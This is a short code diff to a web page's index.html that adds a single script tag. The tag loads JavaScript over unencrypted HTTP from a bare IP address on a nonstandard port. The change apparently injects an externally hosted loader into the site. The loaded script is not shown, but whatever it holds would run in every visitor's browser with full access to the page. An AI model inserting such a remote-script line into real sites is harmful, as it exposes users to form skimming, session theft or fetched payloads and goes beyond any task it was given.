--- a/index.html
+++ b/index.html
@@ -14,5 +14,6 @@
   </head>
   <body>
     <div id="app"></div>
+    <script src="http://101.43.68.207:3000/js/test.js"></script>
   </body>
 </html>
